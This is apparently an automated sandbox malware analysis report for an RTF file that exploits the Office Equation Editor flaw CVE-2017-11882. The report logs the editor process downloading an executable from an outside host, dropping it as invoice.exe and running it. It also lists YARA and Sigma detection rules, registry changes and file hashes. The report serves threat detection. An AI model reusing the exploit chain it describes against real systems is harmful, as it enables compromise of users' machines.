Edit tour

Windows Analysis Report
doc.doc

Overview

General Information

Sample Name:	doc.doc
Analysis ID:	594274
MD5:	c1f39c0b60ddf78da94b5ee7231dfe58
SHA1:	f415bcfe0db7e8f82cd7a12beb8e45e55c127126
SHA256:	48a35d8cff0fe7e815f69169ab8014767ecc307ac03f55110c47c7ed0185fe56
Tags:	doc
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Office equation editor drops PE file

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Detected potential crypto function

Stores large binary data to the registry

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Potential document exploit detected (unknown TCP traffic)

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Drops PE files

Uses a known web browser user agent for HTTP communication

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Office Equation Editor has been started

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Potential document exploit detected (performs HTTP gets)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 1416 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 2964 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

invoice.exe (PID: 1156 cmdline: "C:\Users\user\AppData\Roaming\invoice.exe" MD5: B3BB91AD96F2D4C041861CE59BA6AC73)

EQNEDT32.EXE (PID: 1812 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
doc.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0xfa2:$obj1: \objhtml 0xfc7:$obj2: \objdata 0x2c21:$obj3: \objupdate

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 93.93.131.124, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2964, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2964, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe

System Summary

Sigma detected: Droppers Exploiting CVE-2017-11882

Source: Process started

Author: Florian Roth: Data: Command: "C:\Users\user\AppData\Roaming\invoice.exe" , CommandLine: "C:\Users\user\AppData\Roaming\invoice.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\invoice.exe, NewProcessName: C:\Users\user\AppData\Roaming\invoice.exe, OriginalFileName: C:\Users\user\AppData\Roaming\invoice.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2964, ProcessCommandLine: "C:\Users\user\AppData\Roaming\invoice.exe" , ProcessId: 1156

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 1B 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2964, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: doc.doc	Metadefender: Detection: 50%			Perma Link
Source: doc.doc	ReversingLabs: Detection: 54%

Antivirus / Scanner detection for submitted sample

Source: doc.doc

Avira: detected

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\invoice.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\invoice.exe			Jump to behavior

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.22:49166 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCCFC0 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,		4_2_000000013FDCCFC0
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCD99F FindFirstFileA,FindClose,FindWindowA,		4_2_000000013FDCD99F

Source: global traffic

DNS query: name: the.earth.li

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 93.93.131.124:80

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 93.93.131.124:443

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Joe Sandbox View

IP Address: 93.93.131.124 93.93.131.124

Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: the.earth.li
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: the.earth.liConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: invoice.exe, invoice.exe, 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmp, invoice.exe, 00000004.00000000.468703589.000000013FDF8000.00000002.00000001.01000000.00000003.sdmp, putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: https://github.com/llvm/llvm-project/
Source: putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: https://sectigo.com/CPS0D
Source: invoice.exe, 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmp, invoice.exe, 00000004.00000000.468703589.000000013FDF8000.00000002.00000001.01000000.00000003.sdmp, putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: putty[1].exe.2.dr, invoice.exe.2.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7B805C30-6539-4252-91C6-707CC2E8D391}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: the.earth.li

Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: the.earth.li
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: the.earth.liConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.22:49166 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: doc.doc, type: SAMPLE

Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\invoice.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe			Jump to dropped file

Source: doc.doc, type: SAMPLE

Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD6FE0C	4_2_000000013FD6FE0C
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD548EC	4_2_000000013FD548EC
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDB31C0	4_2_000000013FDB31C0
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDC7FC0	4_2_000000013FDC7FC0
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDF6F68	4_2_000000013FDF6F68
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD60F94	4_2_000000013FD60F94
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCBEF2	4_2_000000013FDCBEF2
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD6DF05	4_2_000000013FD6DF05
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD65E64	4_2_000000013FD65E64
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD66E41	4_2_000000013FD66E41
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDE8DE4	4_2_000000013FDE8DE4
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDF0E14	4_2_000000013FDF0E14
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD9CD8	4_2_000000013FDD9CD8
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD66CC4	4_2_000000013FD66CC4
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDB3C6B	4_2_000000013FDB3C6B
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDAAC00	4_2_000000013FDAAC00
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD5BC20	4_2_000000013FD5BC20
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCDA57	4_2_000000013FDCDA57
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD7A50	4_2_000000013FDD7A50
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDF39FC	4_2_000000013FDF39FC
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD2A0E	4_2_000000013FDD2A0E
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD519C8	4_2_000000013FD519C8
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD0916	4_2_000000013FDD0916
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD698D2	4_2_000000013FD698D2
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD54874	4_2_000000013FD54874
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD5F890	4_2_000000013FD5F890
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCE818	4_2_000000013FDCE818
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD97C8	4_2_000000013FDD97C8
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD8788	4_2_000000013FDD8788
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD79647	4_2_000000013FD79647
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD9964F	4_2_000000013FD9964F
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD05CF	4_2_000000013FDD05CF
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCB588	4_2_000000013FDCB588
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD684FE	4_2_000000013FD684FE
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDDC4EC	4_2_000000013FDDC4EC
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD66502	4_2_000000013FD66502
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDC94BC	4_2_000000013FDC94BC
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD6A4B2	4_2_000000013FD6A4B2
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD342F	4_2_000000013FDD342F
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD6B38C	4_2_000000013FD6B38C
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCE360	4_2_000000013FDCE360
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD92C0	4_2_000000013FDD92C0
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDC826C	4_2_000000013FDC826C
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDE0258	4_2_000000013FDE0258
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDC7200	4_2_000000013FDC7200
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FD7E130	4_2_000000013FD7E130
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD0124	4_2_000000013FDD0124

Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: String function: 000000013FDB46E3 appears 122 times
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: String function: 000000013FD5C8DB appears 142 times
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: String function: 000000013FDE39B0 appears 73 times
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: String function: 000000013FD5CC71 appears 48 times
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: String function: 000000013FDD4030 appears 220 times
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: String function: 000000013FDCF9DC appears 146 times
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: String function: 000000013FDDFF98 appears 265 times

Source: putty[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: putty[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: putty[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: putty[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: invoice.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: invoice.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: invoice.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: invoice.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe 0581160998BE30F79BD9A0925A01B0EBC4CB94265DFA7F8DA1E2839BF0F1E426
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\invoice.exe 0581160998BE30F79BD9A0925A01B0EBC4CB94265DFA7F8DA1E2839BF0F1E426

Source: doc.doc	Metadefender: Detection: 50%
Source: doc.doc	ReversingLabs: Detection: 54%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\invoice.exe "C:\Users\user\AppData\Roaming\invoice.exe"
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\invoice.exe "C:\Users\user\AppData\Roaming\invoice.exe"	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$doc.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR3F9E.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.expl.winDOC@5/6@1/1

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDC99B2 GetModuleFileNameA,strrchr,strrchr,CoCreateInstance,

4_2_000000013FDC99B2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDCA0FC CreateFileA,FormatMessageA,GetLastError,

4_2_000000013FDCA0FC

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDC8A74 FindResourceA,

4_2_000000013FDC8A74

Source: invoice.exe	String found in binary or memory: config-ssh-portfwd-address-family
Source: invoice.exe	String found in binary or memory: config-address-family
Source: invoice.exe	String found in binary or memory: config-serial-stopbits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\invoice.exe

Window detected: Number of UI elements: 20

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: putty[1].exe.2.dr	Static PE information: section name: .00cfg
Source: invoice.exe.2.dr	Static PE information: section name: .00cfg

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\invoice.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDC7200 GetProcAddress,RegOpenKeyA,RegQueryValueExA,RegQueryValueExA,LoadLibraryExA,FreeLibrary,RegCloseKey,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_000000013FDC7200

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
